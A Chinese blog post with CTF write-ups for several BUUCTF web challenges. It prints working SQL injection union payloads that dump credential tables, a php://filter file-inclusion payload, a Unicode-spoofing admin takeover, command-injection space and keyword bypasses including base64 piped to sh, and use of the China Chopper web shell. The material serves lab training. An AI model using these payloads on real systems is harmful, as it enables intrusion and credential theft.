buuctf 基础sql Group_concat() 伪协议 ᴬᴰᴹᴵᴺUnicode欺骗 各种绕过(内敛绕过) 菜刀

最新推荐文章于 2024-05-18 21:20:35 发布
最新推荐文章于 2024-05-18 21:20:35 发布
阅读量668 收藏 1
点赞数
分类专栏: CTF WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/107928561
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
WEB
3 篇文章 0 订阅
订阅专栏

文章目录

[极客大挑战 2019]LoveSQL

+ 表示空格(在URL中不能使用空格) %2B
/ 分隔目录和子目录 %2F
? 分隔实际的URL和参数 %3F
# 表示书签 %23
& URL中指定的参数间的分隔符 %26
= URL中指定的参数的值 %3D

在这里插入图片描述
试一下万能
admin
1’ or ‘1 = 1’#
在这里插入图片描述
md5,换个方向

/check.php?username=admin' order by 4%23&password=1
/check.php?username=admin' order by 3%23&password=1

在这里插入图片描述
在这里插入图片描述
说明有3个字段

/check.php?username=1' union select 1, 2,3%23&password=1

用union查询测试注入点(回显点位)
在这里插入图片描述
2和3

看数据库和版本

username=1' union select 1,database(),version()%23&password=1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述


爆库

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

在这里插入图片描述
爆表

/check.php?username=1' union select 1,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

在这里插入图片描述

/check.php?username=1' union select 1,3,group_concat(id,username,password) from l0ve1ysq1%23&password=1

在这里插入图片描述

[ACTF2020 新生赛]Include

filter伪协议
?file=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述
base64解码后得到flag
关于伪协议:
https://zhuanlan.zhihu.com/p/49206578

- [HCTF 2018]admin

第一种,直接登进去:admin,123,就进去了……

第二种,Unicode欺骗,使用ᴬᴰᴹᴵᴺ,然后改密码,再登录,你就是admin了

[GXYCTF2019]Ping Ping Ping

在这里插入图片描述
进去先随便输点什么
cat flag
在这里插入图片描述
过滤了空格
空格过滤:
${IFS}替换
$IFS$1替换
${IFS替换
%20替换
<和<>重定向符替换
%09替换
在这里插入图片描述
flag不行
那么先ls看看
在这里插入图片描述
在这里插入图片描述

过滤了这些
那有三种方法:
① ?ip=1;a=g;cat$IFS$1fla$a.php;

②echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

③?ip=127.0.0.1;cat$IFS$1`ls`

第一种就是让a=g,然后绕过
第二种是使用cat flag的bash64编码绕过
echo是打印出来输入的内容,echo打印出cat flag,然后sh执行
第三种是内敛绕过
内敛执行绕过
``将反引号内命令的输出作为输入执行 ls将ls出来的文件作为输入 cat ls

cat绕过:
(1)more:一页一页的显示档案内容
(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容

内敛执行绕过
``将反引号内命令的输出作为输入执行 ls将ls出来的文件作为输入 cat ls

https://blog.csdn.net/qq_46184013/article/details/107061110?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param

https://www.ghtwf01.cn/index.php/archives/273/

[极客大挑战 2019]Knife

直接用菜刀连上去就好
在这里插入图片描述
切换到根目录,看到flag,cat flag
在这里插入图片描述

真岛忍
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[网鼎杯 2020 朱雀组]phpweb-------细致猜测,绕过黑名单,
Zero_Adam的博客
02-15 447
目录:缺点&&不足WP方法一、反序列化绕过方法二:命名空间绕过黑名单: 缺点&&不足 抓包不细致,这个题,我抓到了第一个包,没有看到第二个包。 没有注意到data可能是个函数,没有进一步去网上查找函数, 要时时刻刻注意warning的字样,注意报错信息 WP 抓包, 貌似,date是个函数啊。随便一改,又有报错,而且是 call_users_func。这个在做那个啥杯的时候学习过了,不错的函数 还是先复习一下call_users_func怎么用吧,,这不就找到了么。只写
如何修改Mysqlgroup_concat的长度限制
09-09
`group_concat_max_len`变量决定了`GROUP_CONCAT`函数返回的最大长度。你可以通过以下两种方式来修改这个限制: 1. **临时修改(仅限当前会话)**: ```sql SET SESSION group_concat_max_len = 102400; ``` 这...
unicode欺骗—— hctf - admin
ancan8807的博客
09-07 741
查看源代码,发现<!-- you are not admin --> 提示要以管理员身份登陆 尝试注册管理员账号,提示The username has been registered 于是尝试随便注册一个账号,发现注册成功,并能够登陆 根据页面提示,猜测是通过更改admin账号的密码获取flag 于是进入change password界面,读取源码 发现提示...
【Baisc】BUU SQL COURSE
最新发布
欢迎来到我的学习笔记薄
05-18 570
继续肝。
[HCTF 2018]admin——Unicode欺骗
sGanYu
10-16 1319
一、暴力破解 基于表单的暴力破解 缺少验证码匹配,无登录次数限制等等条件,可以对用户名或密码暴力破解 burp抓包 设置target
ctf php文件绕过 菜刀,buuctf 基础sql Group_concat() 伪协议 Unicode欺骗 各种绕过(内敛绕过) 菜刀...
weixin_30851261的博客
04-06 370
文章目录[极客大挑战 2019]LoveSQL[ACTF2020 新生赛]Include- [HCTF 2018]admin[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]LoveSQL+ 表示空格(在URL中不能使用空格) %2B/ 分隔目录和子目录 %2F? 分隔实际的URL和参数 %3F# 表示书签 %23& URL中指定...
BUUCTF之[ZJCTF 2019]NiZhuanSiWei -------------- php和data伪协议,和反序列化
weixin_44632787的博客
07-17 569
BUUCTF之[ZJCTF 2019]NiZhuanSiWei 知识点: PHP伪协议 php://filter data:// 题目: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "&lt
MySQL GROUP_CONCAT限制解决方案
12-14
作用:  GROUP_CONCAT函数可以拼接某个字段值成字符串,默认的分隔符是 逗号,即...SHOW VARIABLES LIKE 'group_concat_max_len' 操作方法:(如图) 调整长度设置方法: (1)在MySQL配置文件中加入:  文件:my.ini
MysqlGROUP_CONCAT()函数使用方法
12-18
MySQL中的GROUP_CONCAT()函数是一个非常实用的聚合函数,它允许你在分组查询时将同一组内的多个值合并成一个字符串。此函数主要用于数据分析和报表生成,尤其在处理多对多关系的数据时,能简化数据处理流程。在本文...
mysqlgroup_concat函数使用示例
12-15
默认情况下,这个限制通常是1024个字符,可以通过修改`group_concat_max_len`系统变量来增大这个限制。 - 分隔符可以是任何字符串,例如空格、冒号或其他自定义的字符。例如,要使用分号作为分隔符,可以这样写:`...
MySQLgroup_concat函数深入理解
09-11
需要注意的是,`GROUP_CONCAT`函数返回的字符串长度受到`group_concat_max_len`系统变量的限制。默认情况下,这个值是1024个字节,如果你需要处理更长的字符串,可以通过`SET`语句临时或全局地修改此变量的值: ```...
[HCTF 2018]admin之unicode欺骗
weixin_52116519的博客
04-22 640
前言 今天这道题完全没接触过,算是学到两种新的解题方法,挺开心的。没有思路,只能按照大佬的wp来记录了。 1、注册admin,但是显示已注册,不能注册,感觉这里应该有大作用。 2、那就随便注册一个。看源码,说不是管理员。 3、又找了其他功能,没发现有啥。4、但是改密码的时候,发现一个链接。 5、访问 6、发现admin,但是密码加密了,没得用。 7、不会了,看wp吧。 解法一:unicode欺骗 1、参考文章 Unicode欺骗 2、nodeprep.prepare()漏洞原理 使用nodeprep.p
Buuctf web真题1(php伪协议&Rce过滤绕过&md5()小bug&http)
weixin_63231007的博客
04-05 2104
[ACTF2020 新生赛]Include 考察利用php://filter伪协议进行文件包含 首先尝试php://input伪协议: 发现被过滤。 然后尝试使用php://filter伪协议来继续包含, 构造playloads:php://filter/read=convert.base64-encode/resource=flag.php 得到base码。 将其进行解码,得到flag。 ......
HCTFadmin--关于flasksession的伪造和unicode欺骗
unexpectedthing的博客
11-07 865
文章目录CTF题目非预期解预期解解法1---flask session伪造解法2----Unicode欺骗解法3---条件竞争 CTF题目 地址:HCTF-admin 非预期解 可以直接登录,利用弱口令 login页面,账号:admin,密码:123,就直接得到flag 预期解 首先进去看到几个界面,login,register,和登录成功后(自己注册然后登录)的四个界面。 然后在index页面源码发现提示,you are not admin,估计题目是让我们登录成admin,然后出flag,于是想到cha
NiZhuanSiWei-[ZJCTF 2019]-[PHP伪协议]-[传送门->BUUCTF]
qwsn
11-24 1656
0x01、Web 1.NiZhuanSiWei-[ZJCTF 2019]-[PHP伪协议]-[传送门->BUUCTF] 第一步:打开环境,点击题目链接,进行代码审计 <?php $text = $_GET["text"]; //GET传参:text $file = $_GET["file"]; //GET传参:file $password = $_GET["password"]; //GET传参:password if(isset($text)&&(file_get_
这种 Unicode 符号,让百万人中招下了假应用…
程序员的那些事
03-05 1786
(点击上方公众号,可快速关注)英文:Gojko Adzic,翻译:伯乐在线 - 精算狗2017年11月 BBC 报道了一个假冒 WhatsApp 的新闻。假应用似乎与官方应用属于同一个开发者名下。原来这些骗子通过在开发者名字中加入 Unicode 的非打印空格(nonprintable space),绕开验证。在 Google Play 维护人员发现之前,下载假应用超过 100 万人。Unicod
CTFbuuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1823
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
-----已搬运-[HarekazeCTF2019]encode_and_encode ----Unicode编码绕过 --- php://filter再敏感一点啊 --- 细心看代码,,被骗了,,
Zero_Adam的博客
03-15 344
一、自己做: 尝试了,但是页面没有反应,再加上不知道怎样去读取,就看wp了 还是粗心了,我看到他说 不能有伪协议,: // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):', 然后,虽然有 file_get_content()函数,我也没有去想用php伪协议来。 后来发现in_valild()这个函数并没有对 page这个变量进行过滤啊。。大意了。。 $content = file_get_cont
BUU-ZJCTF-php反序列化+伪协议
unexpectedthing的博客
10-08 303
文章目录NiZhuanSiWei NiZhuanSiWei 打开环境,看到代码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_cont
sql group_concat函数语句
03-01
GROUP_CONCAT函数是SQL中用于将多行数据合并为一行的聚合函数。它将指定列的值连接起来,并用指定的分隔符进行分隔。以下是GROUP_CONCAT函数的语法和用法: 语法: SELECT column_name, GROUP_CONCAT(expression ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值